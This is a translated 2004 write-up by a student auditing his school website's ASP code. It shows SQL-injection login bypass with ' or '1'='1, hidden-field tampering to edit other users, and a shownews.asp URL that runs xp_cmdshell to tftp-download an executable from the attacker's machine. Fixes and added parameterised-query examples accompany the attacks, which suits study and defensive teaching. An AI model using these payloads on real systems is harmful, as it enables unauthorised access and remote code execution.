Test the security of our school server

xiaoxiao2021-03-06  76

Author: angel. Article type: original. Release date: 2004-04-02.

Preface: Since I, a student, maintain the school's website, my privileges are not small. I would only need to upload a "Haiyang Top Net ASP Trojan" to be able to modify any web page freely, because all of the school's sites are placed under http://www.nothing.com/. But I don't dare to do that, and I wouldn't. Recently I have been learning ASP and find it quite addictive, so I decided to see what hidden dangers there are in my own ASP programs.

Problem one: Apart from a small number of ASP files on the front end, there are the user registration (only the school's own people can register), login, forgot-password and personal-information-modification ASP files. Let's first look at forgot password. lostpass.asp is just a submission page that contains no ASP statements at all; look at its form.

Its target file is lostpass1.asp. Viewing that file's source, I found no problem (perhaps my level is limited). Then look at the next one, lostpass2.asp. Huh, I found a problem in this statement:

SQL = "SELECT PWD, Answer from [MEMBER] where userid = '" & userid & "' and answer = '" & answer & "'"

Even such a low-level mistake gets made. At this point you only need to construct a special username and password according to the SQL, for example ' or '1'='1, and the program turns the statement into this:

SQL = "SELECT PWD, Answer from [MEMBER] where userid = '' or '1'='1' and answer = '' or '1'='1'"

OR is a logical operator: when two conditions are combined with it, the whole expression holds as long as either one holds, and in the language 1 means true (established). So in this statement the "and" check of the original statement no longer takes effect, because '1'='1' is always true and OR makes the whole condition true. In this way we can submit ' or '1'='1 from the very beginning: no matter which text box it is, submitting ' or '1'='1 gets us smoothly to the next page.

In that case, what happens if we use ' or '1'='1 as both the username and the password to log in? The experiment proved that the login succeeded, because the link for displaying personal data changed and personal information was displayed normally. I found that the real name was not changed, which indicates that some ID is used to identify the user, so I viewed the page source directly and found the important thing: it turned out to rely on a hidden field to distinguish the user. Then, if I modify the Value of that field, can I modify other users? I took my earlier registration form, replaced my number 2001010xxx, modified the relative links in the form, saved it as an HTM file, and then submitted the information I wanted to modify. Looking at my information afterwards, it had been modified. So if I know any user's hidden field value, I can modify that user's information. Isn't that chaos? Set that aside for now... This problem can be solved by writing a function that forbids submitting data from outside the site. However, this vulnerability is somewhat limited: to change a user, you must know the hidden field's Value, otherwise you can only change your own. But since this file is like this, I figured the login verification program should be the same. I tried to log in: success. All members' information, adding and modifying administrators, whatever you like. This problem is actually very simple. 
It can be solved by handling the input characters. At first I thought I would use the Replace() function, but after asking Wind for advice I learned that the Mid() function can solve it well: add a check.
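The hidden-field problem above, where a member number sent back by the browser decides which record gets edited, is an authorization bug separate from the SQL one. As an added example that is not from the article, the following Python sketch (constructed data, hypothetical function names) contrasts the trusting version with one that takes the identity from the server-side session. The article's own suggestion of refusing submissions that come from outside the site depends on a header the browser controls, so the example ties the update to the session instead.

```python
# Constructed sample records standing in for the school's MEMBER table; the keys
# play the role of the member number the page kept in a hidden form field.
MEMBERS = {
    "2001010001": {"realname": "Student A"},
    "2001010002": {"realname": "Student B"},
}


class Forbidden(Exception):
    """Raised when a request tries to act on someone else's record."""


def update_profile_vulnerable(form, members):
    # Mirrors the modify page as described: the record to edit is chosen by the
    # hidden field the browser sent back, so whoever edits that value edits
    # that member's record.
    member = members[form["hidden_id"]]
    member["realname"] = form["realname"]
    return member


def update_profile_safe(session_member_id, form, members):
    # The identity comes from the server-side session established at login.
    # A hidden field may still be present for compatibility, but it is only
    # allowed to agree with the session; it never selects the record.
    submitted = form.get("hidden_id")
    if submitted is not None and submitted != session_member_id:
        raise Forbidden("submitted member id does not match the logged-in user")
    member = members[session_member_id]
    member["realname"] = form["realname"]
    return member


def run_demo():
    # Both paths start from their own copy of the same constructed data.
    vulnerable_store = {k: dict(v) for k, v in MEMBERS.items()}
    safe_store = {k: dict(v) for k, v in MEMBERS.items()}
    # A request from the holder of 2001010001 whose hidden field names 2001010002.
    forged = {"hidden_id": "2001010002", "realname": "changed by someone else"}
    update_profile_vulnerable(forged, vulnerable_store)
    try:
        update_profile_safe("2001010001", forged, safe_store)
        blocked = False
    except Forbidden:
        blocked = True
    return (vulnerable_store["2001010002"]["realname"],
            blocked,
            safe_store["2001010002"]["realname"])


if __name__ == "__main__":
    print(run_demo())
```

The same rule applies to the login page the article goes on to describe: once the session holds the member id, no page should accept that id from the request again.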

    ' Walk the input one character at a time and reject dangerous characters
    For i = 1 To Len(input)
        us = Mid(input, i, 1)
        If us = " " Or us = "'" Or us = "%" Or us = "<" Or us = ">" Or us = "&" Then
            Response.Redirect "error_page.asp"
            Response.End
        End If
    Next

This lets you check the characters the user entered; of course, you should check more special characters. This code checks the input character by character, and if there is a space, single quote, percent sign, < or >, it redirects to the page error_page.asp. Although the "Haiyang Top Net ASP Trojan" has the ability to control the school server, we still have to start from the school's own programs, otherwise it is meaningless; the trojan only plays the role of a code viewer.

Question two: Data-display files usually have SQL injection vulnerabilities, for example show.asp, ShowAnasp, shownews.asp, showuser.asp and so on, because these files easily neglect checking their variables. I saw a shownews.asp file and opened it immediately. The original code is as follows (because the file is large, I removed a lot of the HTML code to save space):

<% Option Explicit %>
<%
Dim sql, rs, rsc, thedate
Dim reviewable, aboutnews
Set rs = Server.CreateObject("ADODB.Recordset")
' Find the number of related news items and whether comments are enabled
rs.Open "select * from news_parameter where parameterid=1", conn, 1, 1
If Not rs.BOF And Not rs.EOF Then
    aboutnews = rs("aboutnews")
    If rs("reviewable") = 1 Then
        reviewable = 1
    Else
        reviewable = 0
    End If
Else
    aboutnews = 5
    reviewable = 1
End If
rs.Close
Set rs = Nothing
Set rs = Server.CreateObject("ADODB.Recordset")
' newsid is taken straight from the request and concatenated into the SQL
sql = "update news set hits = hits + 1 where newsid=" & CStr(Request("newsid"))
conn.Execute sql
If Session("purview") = "" Then
    rs.Open "select * from news where newsid=" & CStr(Request("newsid")) & " and audit=1", conn, 1, 1
Else
    rs.Open "select * from news where newsid=" & CStr(Request("newsid")), conn, 1, 1
End If
If Err.Number <> 0 Then
    Response.Write "Database error"
Else
    If rs.BOF And rs.EOF Then
        rs.Close
        Response.Write "This news item does not exist or has not been reviewed"
    Else
%>
<title><%= rs("topic") %></title>
<meta http-equiv="content-type" content="text/html; charset=GB2312">
</head>
<body bgcolor="#ffffff" text="#000000" topmargin=0 leftmargin=0 rightmargin=0>
<table width="92%" border="0" cellspacing="0" cellpadding="0" align="center">
<tr><td height="36" valign="middle"><div align="center"><br>
<font size=3><b><%= rs("topic") %></b></font>
<hr size=0 width=100%></div></td></tr>
<tr><td><div align="center"><%= rs("ntime") %>
<% If Trim(rs("nfrom")) <> "" Then Response.Write " Source: " & Trim(rs("nfrom")) End If %>
<% If Trim(rs("writer")) <> "" Then Response.Write " Author: " & Trim(rs("writer")) End If %>
Views: <%= rs("hits") %>
<hr size=0 width=100%></div></td></tr>
<tr><td valign="top">
<%
Dim content
content = rs("content")
content = Replace(content, "../../../", "../news/")
Response.Write content
%>
</td></tr>
<tr><td valign="top"><br><br><br><b>---------- Related News ----------</b><br>
<%
Set rsc = Server.CreateObject("ADODB.Recordset")
If Session("purview") = "" Then
    rsc.Open "select top " & aboutnews & " * from news where keys like '%" & Trim(rs("keys")) & "%' and newsid<>" & CStr(rs("newsid")) & " and audit=1 order by ntime desc", conn, 1, 1
Else
    rsc.Open "select top " & aboutnews & " * from news where keys like '%" & Trim(rs("keys")) & "%' and newsid<>" & CStr(rs("newsid")) & " order by ntime desc", conn, 1, 1
End If
If rsc.BOF And rsc.EOF Then
    Response.Write ""   ' the original "no related news" text was lost in extraction
Else
    Response.Write "<ul type=circle>"
    Do While Not rsc.EOF
        Response.Write "<li>"
        thedate = "(" & CStr(Year(rsc("ntime"))) & "-" & CStr(Month(rsc("ntime"))) & "-" & CStr(Day(rsc("ntime"))) & ")"
        Response.Write "<a href='shownews.asp?newsid=" & CStr(rsc("newsid")) & "'>" & Trim(rsc("topic")) & "</a> <font color='#6365ce' size='1'>" & thedate & "</font>"
        ' Mark items from the last day or so as new (date arithmetic reconstructed from a garbled line)
        If Month(rsc("ntime")) = Month(Now()) And CLng(Day(rsc("ntime"))) + 1 >= CLng(Day(Now())) Then
            Response.Write "<img src='NEW_ICON_PATH.gif'>"   ' original image path lost in extraction
        End If
        Response.Write "<br>"
        rsc.MoveNext
    Loop
End If
rsc.Close
Set rsc = Nothing
%>
</ul></td></tr></table>
<!--#include file="Function/Copyright.inc"-->
</body></html>
<%
    End If
End If
%>
<!--#include file="function/dbclose.asp"-->

Have you seen it? The file does not check any variables at all, so how do we use this file? Huh, look at this sentence: rs.Open "select * from news where newsid=" & CStr(Request("newsid")), conn, 1, 1. Since the program does not check the variable at all, we can directly construct a newsid to launch a SQL injection attack.
We can submit a request like the following to execute system commands with the permissions of the user the application uses to connect to this SQL database:

http://ourschool/shownews.asp?newsid=1;exec master.dbo.xp_cmdshell 'tftp -i myip get flash.exe';--

A solution for this file is to filter with the Replace function; see the following code:
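The article's fixes rely on filtering characters out of the input (the Mid() loop in problem one, and the Replace() approach it announces for shownews.asp). A blacklist has to be kept complete for every context the value is used in, whereas passing the value as a bound parameter and validating numeric ids as integers removes the problem regardless of which characters arrive. The following Python example is added here and is not part of the article; it uses an in-memory SQLite database with constructed rows standing in for the MEMBER and news tables, and hypothetical function names. It reproduces the lostpass2.asp statement shape with the article's own ' or '1'='1 input, then shows the parameterised form of that lookup and of the shownews.asp lookup.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the school site's MEMBER and news tables.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE member (userid TEXT, pwd TEXT, answer TEXT);
        INSERT INTO member VALUES ('alice', 'alice-pass', 'blue');
        INSERT INTO member VALUES ('bob', 'bob-pass', 'red');
        CREATE TABLE news (newsid INTEGER, topic TEXT, audit INTEGER);
        INSERT INTO news VALUES (1, 'Public notice', 1);
        INSERT INTO news VALUES (2, 'Unreviewed draft', 0);
    """)
    return conn


def lookup_vulnerable(conn, userid, answer):
    # Same shape as the lostpass2.asp statement: user input is pasted into the
    # SQL text, so a quote in the input ends the literal and the remainder is
    # parsed as SQL.
    sql = ("SELECT pwd, answer FROM member WHERE userid = '" + userid +
           "' AND answer = '" + answer + "'")
    return conn.execute(sql).fetchall()


def lookup_safe(conn, userid, answer):
    # Placeholders: the values travel separately from the statement, so the
    # database only ever compares them as data. (In classic ASP the equivalent
    # is an ADODB.Command with CreateParameter instead of string concatenation.)
    sql = "SELECT pwd, answer FROM member WHERE userid = ? AND answer = ?"
    return conn.execute(sql, (userid, answer)).fetchall()


def parse_newsid(raw):
    # shownews.asp only ever needs a whole number, so anything else is rejected
    # before it gets near the database; "1; exec ..." never reaches a query.
    text = raw.strip()
    if not text.isdecimal():
        raise ValueError("newsid must be a non-negative integer")
    return int(text)


def show_news_safe(conn, raw_newsid, logged_in):
    # Keeps the page's audit filter for anonymous visitors and binds the
    # validated id as a parameter rather than concatenating it.
    newsid = parse_newsid(raw_newsid)
    sql = "SELECT newsid, topic FROM news WHERE newsid = ?"
    if not logged_in:
        sql += " AND audit = 1"
    return conn.execute(sql, (newsid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"   # the article's own test input
    print("concatenated :", lookup_vulnerable(db, payload, payload))  # every member row
    print("parameterised:", lookup_safe(db, payload, payload))        # []
    print("newsid=1 anon:", show_news_safe(db, "1", False))
```

With the concatenated statement the condition collapses to userid = '' OR ('1'='1' AND answer = '') OR '1'='1', which is true for every row, so the lookup returns all members; the parameterised version compares the literal string and returns nothing. For shownews.asp the integer check alone already defeats the stacked-query URL above, and the parameter keeps the audit filter intact.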